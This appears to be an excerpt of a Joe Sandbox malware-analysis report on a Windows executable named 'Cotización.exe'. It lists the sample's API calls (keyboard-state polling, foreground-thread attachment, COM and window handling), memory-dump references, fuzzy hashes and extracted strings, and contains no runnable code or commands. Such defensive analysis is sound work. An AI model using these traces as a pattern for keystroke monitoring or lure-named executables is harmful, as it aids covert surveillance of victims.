                APIs
                • GetKeyboardState.USER32(?), ref: 0044480E
                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                • GetKeyState.USER32(000000A0), ref: 004448AA
                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                • GetKeyState.USER32(000000A1), ref: 004448D9
                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                • GetKeyState.USER32(00000011), ref: 00444903
                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                • GetKeyState.USER32(00000012), ref: 0044492D
                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                • GetKeyState.USER32(0000005B), ref: 00444958
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: InitVariant$_malloc_wcscpy_wcslen
                • String ID:
                • API String ID: 3413494760-0
                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AddressProc_free_malloc$_strcat_strlen
                • String ID: AU3_FreeVar
                • API String ID: 2634073740-771828931
                • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                APIs
                • CoInitialize.OLE32 ref: 0046C63A
                • CoUninitialize.OLE32 ref: 0046C645
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                • IIDFromString.OLE32(?,?), ref: 0046C705
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                • API String ID: 2294789929-1287834457
                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                APIs
                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                • ImageList_EndDrag.COMCTL32 ref: 00471169
                • ReleaseCapture.USER32 ref: 0047116F
                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                • API String ID: 2483343779-2107944366
                • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                APIs
                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                • _wcslen.LIBCMT ref: 00450720
                • _wcscat.LIBCMT ref: 00450733
                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$Window_wcscat_wcslen
                • String ID: -----$SysListView32
                • API String ID: 4008455318-3975388722
                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                • GetParent.USER32 ref: 00469C98
                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                • GetParent.USER32 ref: 00469CBC
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 2360848162-1403004172
                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                • String ID:
                • API String ID: 262282135-0
                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                APIs
                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                APIs
                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                • SendMessageW.USER32(760923D0,00001001,00000000,?), ref: 00448E16
                • SendMessageW.USER32(760923D0,00001026,00000000,?), ref: 00448E25
                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                • String ID:
                • API String ID: 3771399671-0
                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 00434643
                • GetForegroundWindow.USER32(00000000), ref: 00434655
                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                • String ID:
                • API String ID: 2156557900-0
                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                • API String ID: 0-1603158881
                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                APIs
                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                • DestroyWindow.USER32(?), ref: 00426F50
                • UnregisterHotKey.USER32(?), ref: 00426F77
                • FreeLibrary.KERNEL32(?), ref: 0042701F
                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                • String ID: close all$ou
                • API String ID: 4174999648-2099725088
                • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                APIs
                • CreateMenu.USER32 ref: 00448603
                • SetMenu.USER32(?,00000000), ref: 00448613
                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                • IsMenu.USER32(?), ref: 004486AB
                • CreatePopupMenu.USER32 ref: 004486B5
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                • DrawMenuBar.USER32 ref: 004486F5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                • String ID: 0
                • API String ID: 161812096-4108050209
                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                APIs
                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Cotizaci#U00f3n.exe), ref: 00434057
                • LoadStringW.USER32(00000000), ref: 00434060
                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                • LoadStringW.USER32(00000000), ref: 00434078
                • _wprintf.LIBCMT ref: 004340A1
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                Strings
                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                • C:\Users\user\Desktop\Cotizaci#U00f3n.exe, xrefs: 00434040
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: HandleLoadModuleString$Message_wprintf
                • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Cotizaci#U00f3n.exe
                • API String ID: 3648134473-3532850939
                • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
